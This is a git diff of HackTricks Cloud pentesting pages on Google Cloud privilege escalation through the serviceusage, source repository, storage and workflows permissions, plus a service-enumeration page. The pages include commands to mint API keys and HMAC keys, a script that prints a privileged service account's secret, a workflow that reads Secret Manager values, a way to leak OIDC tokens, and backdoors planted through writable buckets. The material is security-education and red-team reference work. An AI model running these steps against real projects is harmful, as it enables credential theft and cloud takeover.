+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
new file mode 100644
index 0000000000..e7c58e7253
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md
@@ -0,0 +1,74 @@
+# GCP - Serviceusage Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## serviceusage
+
+The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
+
+Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
+
+To learn other permissions and ways to generate API keys check:
+
+{% content-ref url="gcp-apikeys-privesc.md" %}
+[gcp-apikeys-privesc.md](gcp-apikeys-privesc.md)
+{% endcontent-ref %}
+
+### `serviceusage.apiKeys.create`
+
+An undocumented API was found that can be used to **create API keys:**
+
+{% code overflow="wrap" %}
+```bash
+curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
+```
+{% endcode %}
+
+### `serviceusage.apiKeys.list`
+
+Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response):
+
+{% code overflow="wrap" %}
+```bash
+curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
+```
+{% endcode %}
+
+### **`serviceusage.services.enable`** , **`serviceusage.services.use`**
+
+With these permissions an attacker can enable and use new services in the project. This could allow an **attacker to enable service like admin or cloudidentity** to try to access Workspace information, or other services to access interesting data.
+
+## **References**
+
+* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)\*\*\*\*
+
+**.**
+
+</details>
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
new file mode 100644
index 0000000000..8ef9a508e5
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
@@ -0,0 +1,115 @@
+# GCP - Sourcerepos Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Source Repositories
+
+For more information about Source Repositories check:
+
+{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %}
+[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md)
+{% endcontent-ref %}
+
+### `source.repos.get`
+
+With this permission it's possible to download the repository locally:
+
+```bash
+gcloud source repos clone <repo-name> --project=<project-uniq-name>
+```
+
+### `source.repos.update`
+
+A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone <repo>`**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like:
+
+* Owner
+* Editor
+* Source Repository Administrator (`roles/source.admin`)
+* Source Repository Writer (`roles/source.writer`)
+
+To write just perform a regular **`git push`**.
+
+### `source.repos.setIamPolicy`
+
+With this permission an attacker could grant himself the previous permissions.
+
+### Secret access
+
+If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check:
+
+{% content-ref url="gcp-secretmanager-privesc.md" %}
+[gcp-secretmanager-privesc.md](gcp-secretmanager-privesc.md)
+{% endcontent-ref %}
+
+### Add SSH keys
+
+It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh\_keys](https://source.cloud.google.com/user/ssh_keys)
+
+Once your ssh key is set, you can access a repo with:
+
+{% code overflow="wrap" %}
+```bash
+git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
+```
+{% endcode %}
+
+And then use **`git`** commands are per usual.
+
+### Manual Credentials
+
+It's possible to create manual credentials to access the Source Repositories:
+
+<figure><img src="../../../.gitbook/assets/image (324).png" alt=""><figcaption></figcaption></figure>
+
+Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3)
+
+Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this.
+
+This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`**
+
+<figure><img src="../../../.gitbook/assets/image (323).png" alt=""><figcaption></figcaption></figure>
+
+Executing the script you can then use git clone, push... and it will work.
+
+### `source.repos.updateProjectConfig`
+
+With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys:
+
+```bash
+gcloud source project-configs update --disable-pushblock
+```
+
+You can also configure a different pub/sub topic or even disable it completely:
+
+```bash
+gcloud source project-configs update --remove-topic=REMOVE_TOPIC
+gcloud source project-configs update --remove-topic=UPDATE_TOPIC
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
new file mode 100644
index 0000000000..3a3594bddd
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md
@@ -0,0 +1,146 @@
+# GCP - Storage Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Storage
+
+Basic Information:
+
+{% content-ref url="../gcp-services/gcp-storage-enum.md" %}
+[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md)
+{% endcontent-ref %}
+
+### `storage.objects.get`
+
+This permission allows you to **download files stored inside Cloud Storage**. This will potentially allow you to escalate privileges because in some occasions **sensitive information is saved there**. Moreover, some GCP services stores their information in buckets:
+
+* **GCP Composer**: When you create a Composer Environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside of their code.
+* **GCR (Container Registry)**: The **image** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
+
+### `storage.objects.setIamPolicy`
+
+You can give you permission to **abuse any of the previous scenarios of this section**.
+
+### **`storage.buckets.setIamPolicy`**
+
+For an example on how to modify permissions with this permission check this page:
+
+{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md" %}
+[gcp-public-buckets-privilege-escalation.md](../gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md)
+{% endcontent-ref %}
+
+### `storage.hmacKeys.create`
+
+Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, allowing for potential backup access storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.
+
+{% code overflow="wrap" %}
+```bash
+# Create key
+gsutil hmac create <sa-email> # You might need to execute this inside a VM instance
+
+## If you have TROUBLES creating the HMAC key this was you can also do it contacting the API directly:
+PROJECT_ID = '$PROJECT_ID'
+TARGET_SERVICE_ACCOUNT = f"exam-storage-sa-read-flag-3@{PROJECT_ID}.iam.gserviceaccount.com"
+ACCESS_TOKEN = "$CLOUDSDK_AUTH_ACCESS_TOKEN"
+import requests
+import json
+key = requests.post(
+    f'https://www.googleapis.com/storage/v1/projects/{PROJECT_ID}/hmacKeys',
+    params={'access_token': ACCESS_TOKEN, 'serviceAccountEmail': TARGET_SERVICE_ACCOUNT}
+).json()
+#print(json.dumps(key, indent=4))
+print(f'ID: {key["metadata"]["accessId"]}')
+print(f'Secret: {key["secret"]}')
+
+
+# Configure gsutil to use the HMAC key
+gcloud config set pass_credentials_to_gsutil false
+gsutil config -a
+
+# Use it
+gsutil ls gs://[BUCKET_NAME]
+
+# Restore
+gcloud config set pass_credentials_to_gsutil true
+```
+{% endcode %}
+
+Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
+
+## `storage.objects.create`, `storage.objects.delete` = Storage Write permissions
+
+In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object_permissions), you need also `storage.objects.delete` to **modify** an existent object.
+
+A very **common exploitation** of buckets where you can write in cloud is in case the **bucket is saving web server files**, you might be able to **store new code** that will be used by the web application.
+
+### Composer
+
+**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
+
+* It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer
+* All the components of a composer environments (**code of DAGs**, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.
+
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs**](https://github.com/carlospolop/Monitor-Backdoor-Composer-DAGs)
+
+### Cloud Functions
+
+* Cloud Functions code is stored in Storage and whenever a new version is created the code is pushed to the bucket and then the new container is build from this code. Therefore, **overwriting the code before the new version gets built it's possible to make the cloud function execute arbitrary code**.
+
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions**](https://github.com/carlospolop/Monitor-Backdoor-Cloud-Functions)
+
+### App Engine
+
+AppEngine versions generate some data inside a bucket with the format name: `staging.<project-id>.appspot.com`. Inside this bucket, it's possible to find a folder called `ae` that will contain a folder per version of the AppEngine app and inside these folders it'll be possible to find the `manifest.json` file. This file contains a json with all the files that must be used to create the specific version. Moreover, it's possible to find the **real names of the files, the URL to them inside the GCP bucket (the files inside the bucket changed their name for their sha1 hash) and the sha1 hash of each file.**
+
+_Note that it's not possible to pre-takeover this bucket because GCP users aren't authorized to generate buckets using the domain name appspot.com._
+
+However, with read & write access over this bucket, it's possible to escalate privileges to the SA attached to the App Engine version by monitoring the bucket and any time a change is performed (new version), modify the new version as fast as possible. This way, the container that gets created from this code will execute the backdoored code.
+
+The mentioned attack can be performed in a lot of different ways, all of them start by monitoring the `staging.<project-id>.appspot.com` bucket:
+
+* Upload the complete new code of the AppEngine version to a different and available bucket and prepare a **`manifest.json` file with the new bucket name and sha1 hashes of them**. Then, when a new version is created inside the bucket, you just need to modify the `manifest.json` file and upload the malicious one.
+* Upload a modified `requirements.txt` version that will use a the **malicious dependencies code and update the `manifest.json`** file with the new filename, URL and the hash of it.
+* Upload a **modified `main.py` or `app.yaml` file that will execute the malicious code** and update the `manifest.json` file with the new filename, URL and the hash of it.
+
+**You can find a PoC of this attack in the repo:** [**https://github.com/carlospolop/Monitor-Backdoor-AppEngine**](https://github.com/carlospolop/Monitor-Backdoor-AppEngine)
+
+### GCR
+
+* **Google Container Registry** stores the images inside buckets, if you can **write those buckets** you might be able to **move laterally to where those buckets are being run.**
+  * The bucket used by GCR will have an URL similar to `gs://<eu/usa/asia/nothing>.artifacts.<project>.appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
+
+{% hint style="success" %}
+This service is deprecated so this attack is no longer useful. Moreover, Artifact Registry, the service that substitutes this one, does't store the images in buckets.
+{% endhint %}
+
+## **References**
+
+* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#:\~:text=apiKeys.-,create,privileges%20than%20our%20own%20user.](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
new file mode 100644
index 0000000000..5ee421cafb
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
@@ -0,0 +1,139 @@
+# GCP - Workflows Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Workflows
+
+Basic Information:
+
+{% content-ref url="../gcp-services/gcp-workflows-enum.md" %}
+[gcp-workflows-enum.md](../gcp-services/gcp-workflows-enum.md)
+{% endcontent-ref %}
+
+### `workflows.workflows.create`, `iam.serviceAccounts.ActAs`, `workflows.executions.create`, (`workflows.workflows.get`, `workflows.operations.get`)
+
+Afaik it's not possible to get a shell with access to the metadata endpoint containing the SA credentials of the SA attacked to a Workflow. However, it's possible to abuse the permissions of the SA by adding the actions to perform inside the Workflow.
+
+It's possible to find the documentation of the connectors. For example, this is the [**page of the Secretmanager connector**](https://cloud.google.com/workflows/docs/reference/googleapis/secretmanager/Overview)**.** In the side bar it's possible to find several other connectors.
+
+And here you can find an example of a connector that prints a secret:
+
+```yaml
+main:
+    params: [input]
+    steps:
+    - access_string_secret:
+        call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
+        args:
+            secret_id: secret_name
+            version: 1
+            project_id: project-id
+        result: str_secret
+    - returnOutput:
+            return: '${str_secret}'
+```
+
+Update from the CLI:
+
+```bash
+gcloud workflows deploy <workflow-name> \
+    --service-account=email@SA \
+    --source=/path/to/config.yaml \
+    --location us-central1
+```
+
+If you get an error like `ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist`, just **wait a minute and try again**.
+
+If you don't have web access it's possible to trigger and see the execution of a Workflow with:
+
+{% code overflow="wrap" %}
+```bash
+# Run execution with output
+gcloud workflows run <workflow-name> --location us-central1
+
+# Run execution without output
+gcloud workflows execute <workflow-name> --location us-central1
+
+# List executions
+gcloud workflows executions list <workflow-name>
+
+# Get execution info and output
+gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
+```
+{% endcode %}
+
+{% hint style="danger" %}
+You can also check the output of previous executions to look for sensitive information
+{% endhint %}
+
+Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflows.operations.get' denied on...` because you don't have that permission, the workflow has been generated.
+
+### Leak OIDC token (and OAuth?)
+
+According [**to the docs**](https://cloud.google.com/workflows/docs/authenticate-from-workflow) it's possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of [Cloud Scheduler](gcp-cloudscheduler-privesc.md), the HTTP request with the Oauth token must be to the host `.googleapis.com`.
+
+{% hint style="danger" %}
+Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint** controlled by the user but to leak the **OAuth** token you would **need a bypass** for that protection. However, you are still able to **contact any GCP api to perform actions on behalf the SA** using either connectors or HTTP requests with the OAuth token.
+{% endhint %}
+
+#### Oauth
+
+{% code overflow="wrap" %}
+```yaml
+    - step_A:
+      call: http.post
+      args:
+          url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
+          auth:
+              type: OAuth2
+              scopes: OAUTH_SCOPE
+```
+{% endcode %}
+
+#### OIDC
+
+```yaml
+    - step_A:
+      call: http.get
+      args:
+          url: https://us-central1-project.cloudfunctions.net/functionA
+          query:
+              firstNumber: 4
+              secondNumber: 6
+              operation: sum
+          auth:
+              type: OIDC
+              audience: OIDC_AUDIENCE
+```
+
+### `workflows.workflows.update` ...
+
+With this permission instead of `workflows.workflows.create` it's possible to update an already existing workflow and perform the same attacks.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/README.md b/pentesting-cloud/gcp-security/gcp-services/README.md
new file mode 100644
index 0000000000..6098aaeb65
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/README.md
@@ -0,0 +1,2 @@
+# GCP - Services
+
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md
new file mode 100644
index 0000000000..abbec67124
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md
@@ -0,0 +1,48 @@
+# GCP - AI Platform Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) <a href="#reviewing-ai-platform-configurations" id="reviewing-ai-platform-configurations"></a>
+
+Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**.
+
+There are a few areas here you can look for interesting information like models and jobs.
+
+```bash
+# Models
+gcloud ai-platform models list
+gcloud ai-platform models describe <model>
+gcloud ai-platform models get-iam-policy <model>
+
+# Jobs
+gcloud ai-platform jobs list
+gcloud ai-platform jobs describe <job>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md
new file mode 100644
index 0000000000..0b4eea5f99
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md
@@ -0,0 +1,71 @@
+# GCP - API Keys Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
